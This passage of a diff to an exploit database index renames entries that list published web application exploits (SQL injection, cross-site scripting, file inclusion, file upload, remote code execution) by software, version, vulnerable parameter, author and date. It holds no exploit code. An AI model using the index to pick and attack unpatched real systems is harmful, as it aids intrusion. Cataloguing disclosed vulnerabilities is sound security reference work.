Injection",2011-07-15,Lazmania61,php,webapps,0 +35956,platforms/php/webapps/35956.txt,"Joomla! Component Foto - 'id_categoria' SQL Injection",2011-07-15,SOLVER,php,webapps,0 +35958,platforms/php/webapps/35958.txt,"Joomla! Component Juicy Gallery - 'picId' SQL Injection",2011-07-15,SOLVER,php,webapps,0 35959,platforms/php/webapps/35959.txt,"Joomla! Component com_hospital - SQL Injection",2011-07-15,SOLVER,php,webapps,0 -35960,platforms/php/webapps/35960.txt,"Joomla! Component Controller - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0 -35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 - search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 +35960,platforms/php/webapps/35960.txt,"Joomla! Component Controller - 'Itemid' SQL Injection",2011-07-15,SOLVER,php,webapps,0 +35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'search.php?search_string' SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35966,platforms/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0 -35967,platforms/php/webapps/35967.txt,"AJ Classifieds - 'listingid' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0 -35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0 +35967,platforms/php/webapps/35967.txt,"AJ Classifieds - 'listingid' SQL Injection",2011-07-15,Lazmania61,php,webapps,0 +35968,platforms/php/webapps/35968.txt,"BlueSoft (Multiple Products) - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0 35971,platforms/php/webapps/35971.txt,"WordPress Plugin bSuite 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injections",2015-02-02,"ITAS Team",php,webapps,0 35973,platforms/php/webapps/35973.txt,"Joomla! < 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0 35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross-Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps,0 35975,platforms/php/webapps/35975.txt,"Cyberoam UTM - Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",php,webapps,0 -35976,platforms/php/webapps/35976.txt,"Synergy Software - 'id' Parameter SQL Injection",2011-07-21,Ehsan_Hp200,php,webapps,0 -35977,platforms/php/webapps/35977.txt,"Godly Forums - 'id' Parameter SQL Injection",2011-07-25,3spi0n,php,webapps,0 +35976,platforms/php/webapps/35976.txt,"Synergy Software - 'id' SQL Injection",2011-07-21,Ehsan_Hp200,php,webapps,0 +35977,platforms/php/webapps/35977.txt,"Godly Forums - 'id' SQL Injection",2011-07-25,3spi0n,php,webapps,0 35978,platforms/php/webapps/35978.txt,"Online Grades 3.2.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",php,webapps,0 35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition - 'viewRecipe.php' SQL Injection",2011-07-25,Lazmania61,php,webapps,0 36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 - Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80 36000,platforms/php/webapps/36000.txt,"HP Network Automation 9.10 - SQL Injection",2011-07-28,anonymous,php,webapps,0 -36001,platforms/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Parameter URI redirection",2011-07-28,"Tom Neaves",asp,webapps,0 +36001,platforms/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' URI Redirection",2011-07-28,"Tom Neaves",asp,webapps,0 36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0 36003,platforms/php/webapps/36003.txt,"Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0 -36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin - 'tab' Parameter SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 +36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin - 'tab' SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 36008,platforms/php/webapps/36008.txt,"Gilnet News - 'read_more.php' SQL Injection",2011-07-11,Err0R,php,webapps,0 -36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank - 'b' Parameter Cross-Site Scripting",2011-08-03,Err0R,php,webapps,0 +36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank - 'b' Cross-Site Scripting",2011-08-03,Err0R,php,webapps,0 36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps,0 -36011,platforms/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0 -36012,platforms/php/webapps/36012.txt,"Joomla! Component com_xeslidegalfx - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 -36015,platforms/php/webapps/36015.txt,"Joomla! Component com_community - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 +36011,platforms/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' SQL Injection",2011-08-03,Err0R,asp,webapps,0 +36012,platforms/php/webapps/36012.txt,"Joomla! Component com_xeslidegalfx - 'id' SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 +36015,platforms/php/webapps/36015.txt,"Joomla! Component com_community - 'userid' SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 -36018,platforms/php/webapps/36018.txt,"WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 +36018,platforms/php/webapps/36018.txt,"WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,asp,webapps,0 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 36023,platforms/php/webapps/36023.txt,"RedaxScript CMS 2.2.0 - SQL Injection",2015-02-09,"ITAS Team",php,webapps,0 @@ -35214,17 +35215,17 @@ id,file,description,date,author,platform,type,port 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0 36058,platforms/php/webapps/36058.txt,"WordPress Plugin Video Gallery 2.7.0 - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps,0 36032,platforms/php/webapps/36032.txt,"Softbiz Recipes Portal Script - Multiple Cross-Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps,0 -36033,platforms/php/webapps/36033.txt,"Search Network 2.0 - 'query' Parameter Cross-Site Scripting",2011-08-08,darkTR,php,webapps,0 +36033,platforms/php/webapps/36033.txt,"Search Network 2.0 - 'query' Cross-Site Scripting",2011-08-08,darkTR,php,webapps,0 36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 -36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange - 'referer_id' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 -36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site - 'ty' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 +36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange - 'referer_id' SQL Injection",2011-08-08,darkTR,php,webapps,0 +36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site - 'ty' SQL Injection",2011-08-08,darkTR,php,webapps,0 36038,platforms/php/webapps/36038.txt,"WordPress Plugin eShop 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure",2015-02-10,"Yakir Wizman",hardware,webapps,0 36043,platforms/php/webapps/36043.rb,"WordPress Plugin WP EasyCart - Unrestricted Arbitrary File Upload (Metasploit)",2015-02-10,Metasploit,php,webapps,80 36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",php,webapps,0 -36046,platforms/php/webapps/36046.txt,"phpWebSite - 'page_id' Parameter Cross-Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 -36047,platforms/php/webapps/36047.txt,"awiki 20100125 - Multiple Local File Inclusion",2011-08-15,muuratsalo,php,webapps,0 +36046,platforms/php/webapps/36046.txt,"phpWebSite - 'page_id' Cross-Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 +36047,platforms/php/webapps/36047.txt,"awiki 20100125 - Multiple Local File Inclusions",2011-08-15,muuratsalo,php,webapps,0 36048,platforms/php/webapps/36048.txt,"phpList 2.10.x - Security Bypass / Information Disclosure",2011-08-15,"Davide Canali",php,webapps,0 36050,platforms/php/webapps/36050.txt,"WordPress Plugin Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross-Site Scripting",2011-08-17,"High-Tech Bridge SA",php,webapps,0 36051,platforms/php/webapps/36051.txt,"WordPress Plugin WP-Stats-Dashboard 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 @@ -35241,11 +35242,11 @@ id,file,description,date,author,platform,type,port 36072,platforms/php/webapps/36072.txt,"OneFileCMS 1.1.1 - 'onefilecms.php' Cross-Site Scripting",2011-08-21,mr.pr0n,php,webapps,0 36073,platforms/php/webapps/36073.txt,"Pandora FMS 3.x - 'index.php' Cross-Site Scripting",2011-08-22,"mehdi boukazoula",php,webapps,0 36074,platforms/php/webapps/36074.txt,"TotalShopUK 1.7.2 - 'index.php' SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 -36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 - 'rcID' Parameter Cross-Site Scripting",2011-08-22,"Aung Khant",php,webapps,0 +36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 - 'rcID' Cross-Site Scripting",2011-08-22,"Aung Khant",php,webapps,0 36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0 -36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 -36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 -36081,platforms/php/webapps/36081.txt,"VicBlog - 'tag' Parameter SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0 +36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 +36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 +36081,platforms/php/webapps/36081.txt,"VicBlog - 'tag' SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'FileManager/Controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum (SMF) 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 @@ -35273,28 +35274,28 @@ id,file,description,date,author,platform,type,port 36112,platforms/php/webapps/36112.txt,"WordPress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 36113,platforms/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 36114,platforms/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injections",2011-09-05,"Eyup CELIK",php,webapps,0 -36116,platforms/asp/webapps/36116.txt,"Kisanji - 'gr' Parameter Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0 -36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x - Multiple Cross-Site Scripting / SQL Injection",2011-09-06,"Yassin Aboukir",php,webapps,0 -36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross-Site Scripting",2011-09-05,"High-Tech Bridge SA",php,webapps,0 +36116,platforms/asp/webapps/36116.txt,"Kisanji - 'gr' Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps,0 +36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x - Multiple Cross-Site Scripting / SQL Injections",2011-09-06,"Yassin Aboukir",php,webapps,0 +36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 - 'themename' Cross-Site Scripting",2011-09-05,"High-Tech Bridge SA",php,webapps,0 36122,platforms/php/webapps/36122.txt,"SkaDate - 'blogs.php' Cross-Site Scripting",2011-09-08,sonyy,php,webapps,0 -36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 - 'cat' Parameter SQL Injection",2011-09-08,SubhashDasyam,php,webapps,0 +36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 - 'cat' SQL Injection",2011-09-08,SubhashDasyam,php,webapps,0 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80 36129,platforms/php/webapps/36129.txt,"Pluck CMS 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",xml,webapps,0 36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0 -36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Parameter Multiple URI Open redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 -36135,platforms/php/webapps/36135.txt,"WordPress Plugin Auctions 1.8.8 - 'wpa_id' Parameter SQL Injection",2011-09-14,sherl0ck_,php,webapps,0 +36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Multiple URI Open redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0 +36135,platforms/php/webapps/36135.txt,"WordPress Plugin Auctions 1.8.8 - 'wpa_id' SQL Injection",2011-09-14,sherl0ck_,php,webapps,0 36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Inclusion",2011-09-15,KedAns-Dz,php,webapps,0 36137,platforms/php/webapps/36137.txt,"PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 -36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' Parameter SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps,0 -36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products - Multiple SQL Injections",2011-09-17,m3rciL3Ss,asp,webapps,0 +36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps,0 +36139,platforms/asp/webapps/36139.txt,"Ay Computer (Multiple Products) - Multiple SQL Injections",2011-09-17,m3rciL3Ss,asp,webapps,0 36140,platforms/php/webapps/36140.txt,"Toko Lite CMS 1.5.2 - HTTP Response Splitting / Cross-Site Scripting",2011-09-19,"Gjoko Krstic",php,webapps,0 -36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross-Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0 -36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' Parameters Multiple Cross-Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 +36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Cross-Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0 +36142,platforms/php/webapps/36142.txt,"net4visions (Multiple Products) - 'dir' Multiple Cross-Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 - Multiple SQL Injections",2011-09-19,Net.Edit0r,php,webapps,0 -36146,platforms/asp/webapps/36146.txt,"i-Gallery 3.4 - 'd' Parameter Cross-Site Scripting",2011-09-21,Kurd-Team,asp,webapps,0 +36146,platforms/asp/webapps/36146.txt,"i-Gallery 3.4 - 'd' Cross-Site Scripting",2011-09-21,Kurd-Team,asp,webapps,0 36147,platforms/php/webapps/36147.txt,"Free Help Desk 1.1b - Multiple Input Validation Vulnerabilities",2011-09-06,"High-Tech Bridge SA",php,webapps,0 36148,platforms/php/webapps/36148.txt,"phpRS 2.8.1 - Multiple SQL Injections / Cross-Site Scripting",2011-09-18,iM4n,php,webapps,0 36149,platforms/php/webapps/36149.txt,"OneCMS 2.6.4 - Multiple SQL Injections",2011-09-21,"kurdish hackers team",php,webapps,0 @@ -35314,56 +35315,56 @@ id,file,description,date,author,platform,type,port 36166,platforms/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,php,webapps,0 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0 36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 -36171,platforms/php/webapps/36171.txt,"Joomla! Component Biitatemplateshop - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0 +36171,platforms/php/webapps/36171.txt,"Joomla! Component Biitatemplateshop - 'groups' SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0 36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0 -36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0 +36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0 36175,platforms/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",php,webapps,0 36176,platforms/php/webapps/36176.txt,"Joomla! < 1.7.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",php,webapps,0 36177,platforms/php/webapps/36177.txt,"Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Stefan Schurtz",php,webapps,0 -36178,platforms/php/webapps/36178.txt,"WordPress Theme Atahualpa 3.6.7 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36179,platforms/php/webapps/36179.txt,"WordPress Theme Hybrid 0.9 - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36180,platforms/php/webapps/36180.txt,"WordPress Theme F8 Lite 4.2.1 - 's' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36181,platforms/php/webapps/36181.txt,"WordPress Theme Elegant Grunge 1.0.3 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36182,platforms/php/webapps/36182.txt,"WordPress Theme EvoLve 1.2.5 - 's' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 -36183,platforms/php/webapps/36183.txt,"WordPress Theme Cover WP 1.6.5 - 's' Parameter Cross-Site Scripting",2011-09-24,jabdah,php,webapps,0 +36178,platforms/php/webapps/36178.txt,"WordPress Theme Atahualpa 3.6.7 - 's' Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36179,platforms/php/webapps/36179.txt,"WordPress Theme Hybrid 0.9 - 'cpage' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36180,platforms/php/webapps/36180.txt,"WordPress Theme F8 Lite 4.2.1 - 's' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36181,platforms/php/webapps/36181.txt,"WordPress Theme Elegant Grunge 1.0.3 - 's' Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36182,platforms/php/webapps/36182.txt,"WordPress Theme EvoLve 1.2.5 - 's' Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36183,platforms/php/webapps/36183.txt,"WordPress Theme Cover WP 1.6.5 - 's' Cross-Site Scripting",2011-09-24,jabdah,php,webapps,0 36184,platforms/php/webapps/36184.txt,"WordPress Theme Web Minimalist 1.1 - 'index.php' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36185,platforms/php/webapps/36185.txt,"WordPress Theme Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 +36185,platforms/php/webapps/36185.txt,"WordPress Theme Pixiv Custom Theme 2.1.5 - 'cpage' Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps,0 36186,platforms/php/webapps/36186.txt,"WordPress Theme Morning Coffee 3.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 36187,platforms/php/webapps/36187.txt,"WordPress Theme Black-LetterHead 1.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 -36191,platforms/php/webapps/36191.txt,"WordPress Theme RedLine 1.65 - 's' Parameter Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 +36191,platforms/php/webapps/36191.txt,"WordPress Theme RedLine 1.65 - 's' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps,0 36192,platforms/php/webapps/36192.txt,"A2CMS - 'index.php' Local File Disclosure",2011-09-28,St493r,php,webapps,0 36193,platforms/php/webapps/36193.txt,"WordPress Plugin WP Bannerize 2.8.7 - 'ajax_sorter.php' SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 36194,platforms/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 - 'more' Object HTML Injection",2011-09-30,"Paul Davis",php,webapps,0 -36195,platforms/php/webapps/36195.txt,"WordPress Theme Trending 0.1 - 'cpage' Parameter Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 -36196,platforms/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' Parameter SQL Injection",2011-10-02,Rem0ve,php,webapps,0 +36195,platforms/php/webapps/36195.txt,"WordPress Theme Trending 0.1 - 'cpage' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps,0 +36196,platforms/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' SQL Injection",2011-10-02,Rem0ve,php,webapps,0 36197,platforms/php/webapps/36197.txt,"ezCourses - admin.asp Security Bypass",2011-10-01,J.O,php,webapps,0 36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0 36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0 36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80 -36203,platforms/php/webapps/36203.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 -36204,platforms/php/webapps/36204.txt,"vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 -36208,platforms/php/webapps/36208.txt,"vTiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 +36203,platforms/php/webapps/36203.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-04,"Aung Khant",php,webapps,0 +36204,platforms/php/webapps/36204.txt,"vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-04,"Aung Khant",php,webapps,0 +36208,platforms/php/webapps/36208.txt,"vTiger CRM 5.2 - 'onlyforuser' SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 36262,platforms/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 -36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 -36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0 +36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 +36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0 36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0 -36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0 -36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0 -36220,platforms/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 -36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 -36222,platforms/php/webapps/36222.txt,"Joomla! Component com_shop - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 -36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0 +36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0 +36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusions",2011-10-10,indoushka,php,webapps,0 +36220,platforms/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 +36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 +36222,platforms/php/webapps/36222.txt,"Joomla! Component com_shop - 'id' SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 +36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusions",2011-10-11,indoushka,php,webapps,0 36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0 36225,platforms/php/webapps/36225.txt,"ContaoCMS 2.10.1 - Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps,0 36226,platforms/php/webapps/36226.txt,"Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0 -36227,platforms/php/webapps/36227.txt,"Joomla! Component com_sgicatalog 